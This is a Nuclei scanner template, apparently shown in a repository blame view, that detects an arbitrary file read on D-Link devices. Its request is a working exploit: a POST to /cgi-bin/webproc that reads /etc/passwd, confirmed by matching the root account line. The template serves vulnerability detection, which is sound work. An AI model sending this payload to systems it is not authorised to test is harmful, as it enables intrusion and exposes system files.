nuclei-templates/misconfiguration/d-link-arbitary-fileread.yaml

27 lines
507 B
YAML
Raw Normal View History

2021-03-02 14:09:19 +00:00
id: dlink-file-read
info:
name: D-Link Arbitrary File Read
author: dhiyaneshDK
severity: high
reference: https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html
2021-03-12 08:57:14 +00:00
tags: dlink,lfi
2021-03-02 14:09:19 +00:00
requests:
- method: POST
path:
- "{{BaseURL}}/cgi-bin/webproc"
2021-03-02 15:44:29 +00:00
body: 'errorpage=/etc/passwd&obj-action=auth&:action=login'
matchers-condition: and
2021-03-02 14:09:19 +00:00
matchers:
2021-03-02 15:44:29 +00:00
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-03-02 14:09:19 +00:00
part: body
2021-03-02 15:44:29 +00:00
- type: status
status:
- 200